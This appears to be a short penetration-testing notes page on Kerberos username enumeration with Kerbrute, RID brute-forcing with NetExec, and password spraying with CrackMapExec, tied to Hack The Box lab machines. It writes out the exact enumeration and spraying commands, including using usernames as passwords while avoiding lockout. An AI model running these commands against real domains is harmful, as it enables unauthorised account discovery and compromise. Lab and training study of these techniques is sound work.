Kerbrute

Overview

Bruteforcing domain usernames is possible with Kerbrute. This is valuable from an information gathering perspective and can lead to some quick wins.

After finding some usernames you can password spray those accounts using their usernames as passwords. This is very common in the real world.

LogoGitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcingGitHub

Kerbrute Attack

CAN ALSO BE DONE BRUTEFORCING RID's USING NXC

nxc smb 10.10.11.236 -u anonymous -p "" --rid-brute 10000

Enumerate for users

kerbrute userenum -d PNPT.LOCAL users.txt --dc DC.PNPT.LOCAL

/usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

HTB machine Manager

Password spray using --no-brute to avoid account lockout

crackmapexec smb 192.168.1.129 -u users.txt -p users.txt --no-brute -d manager.htb
HTB machine Manager
PreviousIPv6 AttacksNextAS-REP Roasting

Last updated